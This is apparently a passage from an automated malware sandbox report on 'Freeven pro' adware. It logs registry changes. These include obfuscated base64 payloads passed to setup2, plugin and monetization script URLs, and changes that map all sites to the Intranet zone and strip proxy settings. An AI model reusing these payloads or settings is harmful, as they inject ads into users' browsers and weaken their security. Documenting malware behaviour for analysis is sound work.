"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2MjdhNDMwMzBlMTIwMDM4MDIwYTRhNDk0MTQ5MTIxMjA0MWQ0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTFiMTUxZjBhMTUyNTFmMWM0NDUyNTM0MzAzMGUxMjAwMWU0YTQ5NDcxMjEyMTkwYzRiMTE0MzExMGQwOTFlMDAwMjEyMDI1ZTAzMTUxMjQ3MDAwNTQ0NGI1MTQwNWQ1ZjU3NTg0MTU1NDUxMDE1NTI0MTdhNmY0YTAzMGQxZTFkMGYxZTI0MTQ0NDUyNTM1MDUyNDk0YTdhNGQ1MDQ2NDg1MTE3MGUwODEyMTkwZTExMGE0YTQ5NDEzMDU4MDcxNDFlNTIzYjQ0Nzk0MTRiNWE0NjUyMDQxZTBhMDExZDA0MjEyOTQ0NGE0ZDUyMTEwMTFkMDUwNDBkNDgyZjFmMDYxYzU5NDQ1MTViMDI1NzQwNWY0NDQ2NTU1MzFhNGI1ZDE2MDUwZjFjMGYxYjFiMDQxOTI1MTUwNTBmMTkwMjRmNDk0MTRjMjUzOTMzM2YzZjM1M2IyMTI4MmYzZjM0MmYyODI4MzIyZDNkMjUyZTNlMzkyMzM4MzIzOTIxMzczZTM0NWQ0YTUwNGExMTAyMGMxYzBmMDUxYjBiMTU0YTRhNDY0ZjJjM2UyODI4MjkyMzNlMjIyZjJjMzYzMzM0M2IzNjIwMzIzZTI3MjUzNjNlMzQ1ZDFiNGI0ZjdhMWI=', 'fhsakzfpmp'); }"

[HKCU\Software\Freeven pro\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){b6"

[HKCU\Software\Freeven pro\Plugins\242]
"URL" = "http://js.ourstatsstaticstack.com/plugins/mins/242.js"

[HKCU\Software\Freeven pro\Plugins\376]
"Version" = "3"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Worm deletes the following registry key(s):

[HKCU\Software\Freeven pro\Plugins\177]
[HKCU\Software\Freeven pro\Plugins\184]
[HKCU\Software\Freeven pro\Plugins\4]
[HKCU\Software\Freeven pro\Plugins\191]
[HKCU\Software\Freeven pro\Plugins\37]
[HKCU\Software\Freeven pro\Plugins\36]
[HKCU\Software\Freeven pro\Plugins\35]
[HKCU\Software\Freeven pro\Plugins\13]
[HKCU\Software\Freeven pro\Plugins\38]
[HKCU\Software\Freeven pro\Plugins\14]
[HKCU\Software\Freeven pro\Plugins\17]
[HKCU\Software\Freeven pro\Plugins\91]
[HKCU\Software\Freeven pro\Plugins\93]
[HKCU\Software\Freeven pro\Plugins\207]
[HKCU\Software\Freeven pro\Plugins\78]
[HKCU\Software\Freeven pro\Plugins\72]
[HKCU\Software\Freeven pro\Plugins\94]
[HKCU\Software\Freeven pro\Plugins\64]
[HKCU\Software\Freeven pro\Plugins\223]
[HKCU\Software\Freeven pro\Plugins\244]
[HKCU\Software\Freeven pro\Plugins\246]
[HKCU\Software\Freeven pro\Plugins\242]
[HKCU\Software\Freeven pro\Plugins\182]
[HKCU\Software\Freeven pro\Plugins\183]
[HKCU\Software\Freeven pro\Plugins\1]
[HKCU\Software\Freeven pro\Plugins\3]
[HKCU\Software\Freeven pro\Plugins\2]
[HKCU\Software\Freeven pro\Plugins\21]
[HKCU\Software\Freeven pro\Plugins\22]
[HKCU\Software\Freeven pro\Plugins]
[HKCU\Software\Freeven pro\Plugins\28]
[HKCU\Software\Freeven pro\Plugins\47]
[HKCU\Software\Freeven pro\Plugins\102]
[HKCU\Software\Freeven pro\Plugins\103]
[HKCU\Software\Freeven pro\Plugins\104]
[HKCU\Software\Freeven pro\Plugins\42]
[HKCU\Software\Freeven pro\Plugins\43]
[HKCU\Software\Freeven pro\Plugins\40]
[HKCU\Software\Freeven pro\Plugins\41]
[HKCU\Software\Freeven pro\Plugins\46]
[HKCU\Software\Freeven pro\Plugins\39]
[HKCU\Software\Freeven pro\Plugins\44]
[HKCU\Software\Freeven pro\Plugins\45]

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Freeven pro-codedownloader.exe:720 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Freeven pro\Plugins\42]
"Name" = "IEInternal"

[HKCU\Software\Freeven pro\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^<]*(<[\w\W] >)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^<(\w )\s*\/?>(?:<\/\1>)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.se5"

[HKCU\Software\Freeven pro\Installer]
"srcid" = "001360"

[HKCU\Software\Freeven pro\Plugins\207]
"Name" = "dbWrapper"

[HKCU\Software\Freeven pro\Plugins\47]
"Name" = "resources_background"

[HKCU\Software\Freeven pro\Plugins\104]
"Name" = "jollywallet_m"

[HKCU\Software\Freeven pro\Plugins\4]
"Name" = "jquery_1_7_1"

[HKCU\Software\Freeven pro\Plugins\78]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderInfo.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Freeven pro\Plugins\14]
"URL" = "http://js.clientstaticserv.com/plugins/mins/CrossriderUtils.js"

[HKCU\Software\Freeven pro\Plugins\182]
"Version" = "3"

[HKCU\Software\Freeven pro\Plugins\40]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\102]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/dealply_m.js"

[HKCU\Software\Freeven pro\Plugins\183]
"URL" = "http://js.clientstaticserv.com/plugins/mins/tabsWrapper.js"

[HKCU\Software\Freeven pro\Manifest]
"Manifest" = "NA"

[HKCU\Software\Freeven pro\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi5"

[HKCU\Software\Freeven pro\Plugins\47]
"Version" = "3"

[HKCU\Software\Freeven pro\Manifest]
"IsButtonEnabled" = "false"

[HKCU\Software\Freeven pro\Plugins\36]
"Name" = "IEBackground"

[HKCU\Software\Freeven pro\Plugins\37]
"Version" = "6"

[HKCU\Software\Freeven pro\Plugins\39]
"Version" = "5"

[HKCU\Software\Freeven pro\Manifest]
"PublisherName" = "Freeven"

[HKCU\Software\Freeven pro\Plugins\21]
"Version" = "5"

[HKCU\Software\Freeven pro\Installer]
"Params" = "{ source_id : 001360, sub_id : 0, uzid : 0"

[HKCU\Software\Freeven pro\Plugins\45]
"Version" = "4"

[HKCU\Software\Crossrider]
"Verifier" = "283fbbb93af62851d4ee04659eadac21"

[HKCU\Software\Freeven pro\Plugins\1]
"Version" = "10"

[HKCU\Software\Freeven pro\Plugins\104]
"Version" = "9"

[HKCU\Software\Freeven pro\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se5"

[HKCU\Software\Freeven pro\Plugins\244]
"Version" = "2"

[HKCU\Software\Freeven pro\Manifest]
"Version" = "22"
"Description" = "Feven Shopping Companion"

[HKCU\Software\Freeven pro\Plugins\14]
"Version" = "11"

[HKCU\Software\Freeven pro\Plugins\91]
"Name" = "monetizationLoader.js"

[HKCU\Software\Freeven pro\Plugins\207]
"URL" = "http://js.clientstaticserv.com/plugins/mins/dbWrapper.js"

[HKCU\Software\Freeven pro\Plugins\13]
"Name" = "CrossriderAppUtils"

[HKCU\Software\Freeven pro]
"ActiveAppId" = "54248"

[HKCU\Software\Freeven pro\Plugins\78]
"Name" = "CrossriderInfo"

[HKCU\Software\Freeven pro\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===n5"

[HKCU\Software\Freeven pro\Plugins\64]
"Version" = "3"

[HKCU\Software\Freeven pro\Plugins\41]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEInfo.js"

[HKCU\Software\Freeven pro\Plugins\207]
"Version" = "2"

[HKCU\Software\Freeven pro\Plugins\28]
"JavaScript" = "var CrossriderInitializerPlugin=(function(e){var c={appId:appAPI._cr_config.appID()},b,g=new e.Deferred(),f;return e.Class.extend({init:function(){b=this;e(document).ready(function(){if(!f){d();}e(body).bindExtensionEvent(__CR_REQUEST_READY,a);});},isReady:function(h){if(h===false){d();}return g.promise();}});function d(){g.resolve();f=true;}function a(){e(body).fireExtensionEvent(__CR_RESPONSE_READY,{appId:c.appId});}}($jquery_171));(function(a){appAPI.initializerPlugin=new CrossriderInitializerPlugin();}($jquery_171));"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Freeven pro\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eve5"

[HKCU\Software\Freeven pro\Manifest]
"RunInFrame" = "false"
"ChangePrevious" = "false"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Freeven pro\Plugins\45]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEOnRequest.js"

[HKCU\Software\Freeven pro\Plugins\94]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEPopup.js"

[HKCU\Software\Freeven pro\Plugins\244]
"Name" = "engageya_inner_m"

[HKCU\Software\Freeven pro\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length<=c.maxlength){e(f,g);}});};})(appAPI);(function(b){var c=functi5"

[HKCU\Software\Freeven pro\Manifest]
"EnableSearchIE" = "false"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Freeven pro\Plugins\17]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\177]
"URL" = "http://js.clientstaticserv.com/plugins/mins/crossriderDashboard.js"

[HKCU\Software\Freeven pro\Plugins\78]
"Version" = "5"

[HKCU\Software\Freeven pro\Plugins\246]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/setup.js"

[HKCU\Software\Freeven pro\Plugins\183]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(c){(new Function(c)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(c){if(typeof c.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:c.tabId},{channel:__tabsReloadTab__});},c.delay);}else{appAPI.message.toAllTabs({tabId:c.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(c){appAPI.message.toAllTabs(c,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(c){if(typeof c!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(d){c(d);});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=function(){try{var f=null;var c=document?document.getElementsByTagName(link):null;if(c){for(var d=0;d
[HKCU\Software\Freeven pro\Plugins\4]
"URL" = "http://js.clientstaticserv.com/plugins/javascripts/jquery-1_7_1_min.js"

[HKCU\Software\Freeven pro\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

[HKCU\Software\Freeven pro\Plugins\64]
"Name" = "appApiMessage"

[HKCU\Software\Freeven pro\Plugins\72]
"URL" = "http://js.clientstaticserv.com/plugins/mins/appApiValidation.js"

[HKCU\Software\Freeven pro\Plugins\13]
"Version" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Freeven pro\Manifest]
"homepageurl" = "NA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Freeven pro\Plugins]
"AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,93,102,103,104,184,191,223,242,244,177,91,28"

[HKCU\Software\Freeven pro\Plugins\103]
"JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[103] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(103, [intext])){ return; } var subId = appAPI.internal.monetization.getSubId(); subId = subId.substr(0,7) 00000000000; var _GPL_loader = { vars: {}, ivars: {}, proto: appAPI.dom.isHttps() ? https:// : http://, baseCDN: cdncache1-a.akamaihd.net, init: function() { var a = ; $jquery.each(this.vars, function(b, c) { a = b = c &"

[HKCU\Software\Freeven pro\Plugins\46]
"Name" = "IETimers"

[HKCU\Software\Freeven pro\Plugins\242]
"Name" = "price_gong_m"

[HKCU\Software\Freeven pro\Plugins\91]
"Version" = "46"

[HKLM\SOFTWARE\Freeven pro\IE\Profiles]
"S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"

[HKCU\Software\Freeven pro\Installer]
"zdata" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Freeven pro\Installer]
"osName" = "XP32"

[HKCU\Software\Freeven pro\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Freeven pro\Plugins\35]
"Name" = "IEAjax"

[HKCU\Software\Freeven pro\Manifest]
"UninstallerOfferAction" = "NA"

[HKCU\Software\Freeven pro\Plugins\36]
"Version" = "8"

[HKCU\Software\Freeven pro\Plugins\191]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/ciuvo_m.js"

[HKCU\Software\Freeven pro\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)<0?0:(window.screenTop-20)5"

[HKCU\Software\Freeven pro\Plugins\191]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTE3MjZhNGQxMjE4MDUxNjNmMGEwNjVhNTk0ZjU4MDQwNTEyMWE0MjQ1NTcxMDFiMWIxODE4MDU0NDFiMDMwZDE1MDA1NDBmMWUwYjQ1MTUwZjFjMGEwZTU1MWYxNTBkNDUwODE4MTEwMDBhMDkxYzEwMTQxODE3MWQ1NTUyNDE0ZTQyMWMwZjA0NTYwMDBiNDE0MzcwNjU1MzBlMWUwYzFhMGIzNjFkMTY0ZTRiNDY0ODEwMWUwYzEzMWM0MDQzNWUxNTBmMWIxZjBhMDY0MTE5MDUwNDEwMDU1NjA5MTcwZTQwMTcwOTE1MGYwYjU3MTkxYzA4NDAwYTFlMTgwNTBmMGIxYTE5MTExZDE1MWI1YzU3NDQ0YzQ0MTUwYTAxNTQwNjAyNDQ0NjcyNjM1YTEzMDMwZjBiMTgwODIzMWM0ODQyNDM1ZTQzNWQ1ZDZjNGE1ODRhNTg0MTE5MWYxZTA1MGYwOTE5MDY1YTU5NGYyMTRlMDIwZTA1MDgxYTExMGQwODU4MzE1ZDZjNGE1ODRhNTg0MTA2MTQwMDE4MDgwZjMyMzk1YTU5NGY1ODA1MTc0NjQyMGMxMzA4MDYwMDFjNGMwNjBmMDQxYzA1MGY0ZDMwMTkwNTA0MTAwNTA4MTgxZDA1MWM1YTUxNGM1YjRhNWYxZjE2MDcwYTFjMDUxZjAzMGU1ZjQzNTgxNDA2MTQwODFlMTE0NDI3MDkxMTE2MTkxNTFjMDMwMzBjMGI0YTQ1NDMxNDA3NTc1MTQ2MWQxMTA0MWMwYzE4NTQzMzEyMGYxZjBlMDUwODExMGExYzFmNWYxNjE4MTEwOTFkMTAxZjFiMWUwMzA5MWQ1ODU3NTgxODQ4MTkwZDFjMTYwYjExMGQxNjQ0NTU1YTRiMTIxNDA1MGIxOTBhMGEwYjFmMWUyZTM5MjkyYTI1MmIzMDNkMzMyODM0MzQzNTJiM2YzYTNjMjYzZTMzMmU65"

[HKCU\Software\Freeven pro\Plugins\94]
"Name" = "IEPopup"

[HKCU\Software\Freeven pro\Manifest]
"BgVersion" = "1"

[HKCU\Software\Freeven pro\Installer]
"ErrorsDomain" = "http://errors.clientstaticserv.com"

[HKCU\Software\Freeven pro\Plugins\36]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IEBackground.js"

[HKCU\Software\Freeven pro\Plugins\1]
"URL" = "http://js.clientstaticserv.com/plugins/mins/base.js"

[HKCU\Software\Freeven pro\Plugins\47]
"URL" = "http://js.clientstaticserv.com/plugins/mins/resources_background.js"

[HKCU\Software\Freeven pro\Installer]
"FullVersion" = "1.34.5.4"

[HKCU\Software\Freeven pro\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Freeven pro\Plugins\39]
"Name" = "IEDatabase"

[HKCU\Software\Freeven pro\Plugins\28]
"URL" = "http://js.clientstaticserv.com/plugins/mins/initializer.js"

[HKCU\Software\Freeven pro\Plugins\43]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars5"

[HKCU\Software\Freeven pro\Plugins]
"NewTabPluginList" = "42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,72,28"

[HKCU\Software\Freeven pro\Plugins\42]
"Version" = "9"

[HKCU\Software\Freeven pro\Plugins\4]
"Version" = "4"

[HKCU\Software\Freeven pro\Plugins\41]
"Version" = "7"

[HKCU\Software\Freeven pro\Plugins\191]
"Version" = "5"

[HKCU\Software\Freeven pro\Plugins\103]
"Version" = "8"

[HKCU\Software\Freeven pro\Plugins\22]
"Version" = "5"

[HKCU\Software\Freeven pro\Plugins\46]
"URL" = "http://js.clientstaticserv.com/plugins/mins/ie/IETimers.js"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 73 70 00 7B 22 24 9A 53 63 90 29 58 F2 CB D2"

[HKCU\Software\Freeven pro\Plugins\2]
"Name" = "ie8_fix_1"

[HKCU\Software\Freeven pro\Plugins\244]
"URL" = "http://js.clientstaticserv.com/plugins/mins/monetization/geo/engageya_inner_m.js"

[HKCU\Software\Freeven pro\Plugins\183]
"Name" = "tabsWrapper"

[HKCU\Software\Freeven pro\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,93,102,184,191,223,242,244,91"

[HKCU\Software\Freeven pro\Plugins\242]
